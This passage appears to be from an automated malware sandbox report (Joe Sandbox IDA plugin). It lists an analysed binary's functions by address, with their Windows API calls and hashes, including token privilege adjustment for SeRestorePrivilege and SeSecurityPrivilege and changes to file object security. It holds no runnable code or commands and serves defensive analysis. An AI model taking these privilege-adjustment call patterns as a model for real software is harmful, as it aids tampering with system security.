                                          • Opcode ID: 6091993d0407b41d1096e467bcedc417f69b3cc921582001fceb4dbf2f452062
                                          • Instruction ID: 2683345625bb2b6ff7a4569ee6bc74124bc6c5927012fb1b6a6cc8e947cd4d2d
                                          • Opcode Fuzzy Hash: 6091993d0407b41d1096e467bcedc417f69b3cc921582001fceb4dbf2f452062
                                          • Instruction Fuzzy Hash: C8F0303420C2619B8708DF6CD88457FBBE4FF85B02F44892DF899C2254E678D444C616
                                          Function 00419C6E Relevance: 2.6, APIs: 2, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNELBASE(00000000,00000100,00000000,?,00000000,0041BA87,00000000), ref: 00419CD3
                                          • GetLastError.KERNEL32(?,00000000,0041BA87,00000000), ref: 00419CDD
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast
                                          • String ID:
                                          • API String ID: 918212764-0
                                          • Opcode ID: f9b6bb7d8100d4bbecf413796a04f0f93ba1cbe6bc72e755fd6993f7c43df49d
                                          • Instruction ID: 0a7daf000d88186497e87b0e4d2920fdb345bf05d39154690c4c97767af7b358
                                          • Opcode Fuzzy Hash: f9b6bb7d8100d4bbecf413796a04f0f93ba1cbe6bc72e755fd6993f7c43df49d
                                          • Instruction Fuzzy Hash: C61159327042046BD3109BA5FC59BEA37A89F9272DF24421FE451872C1EBBD9CC1919D
                                          Function 004132B2 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,00413296,000000E0,00413283,?,00418AD9,00000100), ref: 0041331E
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 10cd39a4e3fb8dc6af8208fefe4471acc436069d1523d61133af57c11b9b0b1b
                                          • Instruction ID: 48b680421b518da560860e7c6281a74435bf10b9df979dcfe3be48ef626c488a
                                          • Opcode Fuzzy Hash: 10cd39a4e3fb8dc6af8208fefe4471acc436069d1523d61133af57c11b9b0b1b
                                          • Instruction Fuzzy Hash: 10F0F932A4522866EA20AF146D417CB6B54AB04725F160123FC60BB2D0CB28FDD1928D

                                          Non-executed Functions

                                          Function 00412830 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,00000000,004125D0), ref: 0041283A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00412841
                                          • LookupPrivilegeValueA.ADVAPI32 ref: 00412874
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00412898
                                          • GetLastError.KERNEL32 ref: 0041289E
                                          • CloseHandle.KERNEL32(?), ref: 004128B3
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,00000000), ref: 004128D5
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004128ED
                                          • GetLastError.KERNEL32 ref: 004128F3
                                          • CloseHandle.KERNEL32(?), ref: 00412908
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Token$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesProcessValue$CurrentOpen
                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                          • API String ID: 1809565852-639343689
                                          • Opcode ID: 0038326b2359d2eb237540bc216a645e7a39cfe756c0de5b997349a01dd5918c
                                          • Instruction ID: 14832d4c124a178f5e51333f31e844f1366d56099beffb2702e6ad8efb91e307
                                          • Opcode Fuzzy Hash: 0038326b2359d2eb237540bc216a645e7a39cfe756c0de5b997349a01dd5918c
                                          • Instruction Fuzzy Hash: 8621B3B5350305BBE610DB65DC05FEB7798AB84B50F408829FA00C61D0DBF4E4598B7D
                                          Function 004125F0 Relevance: 18.1, APIs: 12, Instructions: 91memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(00000008,010E0000,00000005,00000000,00000003,02000000,00000000,76ECFFB0,00000000,00000001,76ECE820,004124B5,?,?), ref: 0041261C
                                          • GetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000,00000000,?), ref: 00412643
                                          • GetLastError.KERNEL32 ref: 00412645
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00412657
                                          • HeapAlloc.KERNEL32(00000000), ref: 0041265E
                                          • GetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000,?,?), ref: 00412678
                                          • SetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000), ref: 00412682
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00412697
                                          • HeapFree.KERNEL32(00000000), ref: 0041269E
                                          • CloseHandle.KERNEL32(00000000), ref: 004126A5
                                          • CreateFileA.KERNEL32(00000008,01000000,00000007,00000000,00000003,00000000,00000000), ref: 004126C0
                                          • CloseHandle.KERNEL32(00000000), ref: 004126C8
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Heap$KernelObjectSecurity$CloseCreateFileHandleProcess$AllocErrorFreeLast
                                          • String ID:
                                          • API String ID: 1259232358-0
                                          • Opcode ID: 2d09ea0bb7638fb770d8096d7de764fb49fa537e4193b44c19bd0124d84c7172
                                          • Instruction ID: 8f95d78b3328024af2753c56ff7b2632f9dbad148f303ec9c12ad49708251d75
                                          • Opcode Fuzzy Hash: 2d09ea0bb7638fb770d8096d7de764fb49fa537e4193b44c19bd0124d84c7172
                                          • Instruction Fuzzy Hash: 1521E271240315BBE7208F65DC49FEB7BA8EF89B11F108525FA04DA1D0D7F4E8018728
                                          Function 0041BC50 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BC86
                                          • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001), ref: 0041BC99
                                          • GetLocaleInfoA.KERNEL32(?,?,00000000,00000080,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BCC0
                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BCE9
                                          • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 0041BD2C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 0041BD52
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1691099609-0
                                          • Opcode ID: ff77e7eca9720c41c7d5f443828ee78ae5fb6385ae2af7653d22f72767a37d0e
                                          • Instruction ID: 958d6847a000fbb349c9dbb8f7dd6cc025be0d133b592c5778a926ff2135057d
                                          • Opcode Fuzzy Hash: ff77e7eca9720c41c7d5f443828ee78ae5fb6385ae2af7653d22f72767a37d0e
                                          • Instruction Fuzzy Hash: 4E318B31601229FBCF228F56DC49EDF7F74FB09B60F108526F915922A0D7788991CAE9
                                          Function 0041BB3D Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BB73
                                          • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BB86
                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000004,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BBAD
                                          • GetLocaleInfoA.KERNEL32(?,?,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BBD2
                                          • GetLocaleInfoA.KERNEL32(?,?,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC13
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC34
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1691099609-0
                                          • Opcode ID: 6176acd9af39b3310e1670d104befc426a1c5ec8e1d33516a1e498ba842b64ba
                                          • Instruction ID: 80d035fc61a38f0af9f2ad217f61039d53b68e42f171c84ccbdcf7cbbead4454
                                          • Opcode Fuzzy Hash: 6176acd9af39b3310e1670d104befc426a1c5ec8e1d33516a1e498ba842b64ba
                                          • Instruction Fuzzy Hash: E7319C31500209EBCF228F56CD45EEF7F75EB49B50F10852AF811922A0D7798991DBE9
                                          Function 00416D51 Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,-00001002,?,00000078), ref: 00416D7F
                                          • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000078), ref: 00416DC5
                                          • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000078), ref: 00416E96
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 9f90090d993ac7c305df7442b75dd3576b7d9cefd0c5a0f2cde790dcd44f731c
                                          • Instruction ID: dc89844be1d73419b197e80717226bdb5770609426176513082cb7a3ad8c00c6
                                          • Opcode Fuzzy Hash: 9f90090d993ac7c305df7442b75dd3576b7d9cefd0c5a0f2cde790dcd44f731c
                                          • Instruction Fuzzy Hash: 7E5194727556015AEB31DB25EC41AEF3BADEB10715F56013FE800C22A1DFA9C8C68B1C
                                          Function 0041BD13 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 0041BD2C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 0041BD52
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharInfoLocaleMultiWide
                                          • String ID:
                                          • API String ID: 1196101659-0
                                          • Opcode ID: 5558466f0abd7b7493cc2bf79b0dddd4ae8569c55b6816c0c4c658fb69c1a660
                                          • Instruction ID: 31d47ac3fd5b94ecb22742bb44b162820398262bd93f2cf498d786ba73a29fe5
                                          • Opcode Fuzzy Hash: 5558466f0abd7b7493cc2bf79b0dddd4ae8569c55b6816c0c4c658fb69c1a660
                                          • Instruction Fuzzy Hash: 62F09A32901229FBCF264F82EC09ADF7F30FB85760F008226F922621A0C7344861CAE5
                                          Function 0041BBFA Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(?,?,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC13
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC34
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharInfoLocaleMultiWide
                                          • String ID:
                                          • API String ID: 1196101659-0
                                          • Opcode ID: 9eb92b3a7cf15e53121553cd13144aa6582e0c2c1dfe65d05ee3244f637f7b10
                                          • Instruction ID: 2d6427f8aa20fe1414e29516085f7d604162f02af8a5e6752e54a78417984fb5
                                          • Opcode Fuzzy Hash: 9eb92b3a7cf15e53121553cd13144aa6582e0c2c1dfe65d05ee3244f637f7b10
                                          • Instruction Fuzzy Hash: 36F03035900219EACF318F56DD05ADFBF31FB45760F10462AF925621E0EB354851DAD5
                                          Function 0041725C Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 0041729D
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: d11bff62c67589dcc09ef5241ee42cdf9f88c74ae04b8c5d5c73e73f0cd26bfb
                                          • Instruction ID: 75be6c02beabf803a7fc4e96b9c3a42d32ccb8a068e701f6d51d91f6728dc3c2
                                          • Opcode Fuzzy Hash: d11bff62c67589dcc09ef5241ee42cdf9f88c74ae04b8c5d5c73e73f0cd26bfb
                                          • Instruction Fuzzy Hash: EE216B3260C0059BDB284A38DD856F67775DB44341B494477FD02CA292E73AEED2D29D
                                          Function 00416FAB Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,-00001001,?,00000078), ref: 00416FD7
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 893157f915b6c02fd5ada0d35b3ef127db9ceb61bb3db7cdc74c10e6e612357b
                                          • Instruction ID: 8b9f09be45cda31c8b1cf3b17cd73bbf62894201d141fe0e773e0c3f75cf106f
                                          • Opcode Fuzzy Hash: 893157f915b6c02fd5ada0d35b3ef127db9ceb61bb3db7cdc74c10e6e612357b
                                          • Instruction Fuzzy Hash: E411B672B692016AE7309B25EC41AEB3BACEB14755F55003FF801D11A1EBA9C4C68B5D
                                          Function 0041709F Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,-00001002,?,00000078), ref: 004170CB
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 63507c303ede3921caba65f6ce60eb42d96a0c8cb0d7c1e69e731b16ec258969
                                          • Instruction ID: 81850ce66d6ca33ab545172f8868e9d86e81415df962d95f81e3ad912132f72d
                                          • Opcode Fuzzy Hash: 63507c303ede3921caba65f6ce60eb42d96a0c8cb0d7c1e69e731b16ec258969
                                          • Instruction Fuzzy Hash: 7A01F7736291116AE7309B34EC02AEB37ACEB10755B61413FF800C5191DFA888C68B48
                                          Function 004171C4 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,00000001,?,00000078), ref: 004171DE
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 719b2f718b54a4177c125953744089af908c5c417972cf9d9832ab5408b7d0b0
                                          • Instruction ID: 6978367b58e2c2410655e08ecac337e351e9f268a727dde218835fb005340b87
                                          • Opcode Fuzzy Hash: 719b2f718b54a4177c125953744089af908c5c417972cf9d9832ab5408b7d0b0
                                          • Instruction Fuzzy Hash: 56F09632948204AAEF31ABB4EC46BCA37B9AB00754F14447BFA10E61D0DA79D4C1CA88
                                          Function 00416CCA Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(00416D51,00000001,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416D30
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          • Opcode ID: a7bb0882fa0fdb173d73acf3e9cadf1c318318983cd881b0aac2a392fc96364d
                                          • Instruction ID: d2e323bb029e7b0a897126f847bf2f891343e842901ec26812400a6b3106f349
                                          • Opcode Fuzzy Hash: a7bb0882fa0fdb173d73acf3e9cadf1c318318983cd881b0aac2a392fc96364d
                                          • Instruction Fuzzy Hash: 2CF081717612128AD7249F35FC0A7A937A5BB10706F96053EE410C61B0CFF884C68A0C
                                          Function 00411CB0 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000400,00000021,?,00000002,00000000,0040941D), ref: 00411CBF
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: f64141a690a3e9232ea995137bec61b94daafc7312ef2b75c4abfc6c2b8b1334
                                          • Instruction ID: b26c8389b7bf11535142398e37757b6b2d15ac830af8ac7aefcefff00ae82d06
                                          • Opcode Fuzzy Hash: f64141a690a3e9232ea995137bec61b94daafc7312ef2b75c4abfc6c2b8b1334
                                          • Instruction Fuzzy Hash: C6E0CD723A150116F72447A4C8C5BF36794F740301F18442BF307C96D0E55CCC81912C
                                          Function 00416F55 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(00416FAB,00000001,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416F94
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          • Opcode ID: 961766b1373d32e20d781233b65e77b415bb57fe1c1931dd36f2c4f9580da8de
                                          • Instruction ID: 24001c68db538805d743db4dfa3dc963df6247e151c5e03366915cc87b7c35c7
                                          • Opcode Fuzzy Hash: 961766b1373d32e20d781233b65e77b415bb57fe1c1931dd36f2c4f9580da8de
                                          • Instruction Fuzzy Hash: C0E092727652118AD7205F30FC057993AA5BB10B05FA6013EE420C10F0CFF944CB8A0C
                                          Function 00417068 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(0041709F,00000001,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00417088
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          • Opcode ID: 01c282eb77641323e9fe874f6d02881c1e97bfe8ac1b72935f4c6e12c196c4f6
                                          • Instruction ID: bae1840d9773f24e5d2ffe4de356391a1d12f5d8f190a3d469efc6c2ed09b3b8
                                          • Opcode Fuzzy Hash: 01c282eb77641323e9fe874f6d02881c1e97bfe8ac1b72935f4c6e12c196c4f6
                                          • Instruction Fuzzy Hash: 4CD05E727623118AD7105F30AD097A93E68AB14F0AFA1886DD910C50E1CAF948C9860C
                                          Function 00411CF0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000400,0000001D,?,00000002,?,00409426), ref: 00411CFF
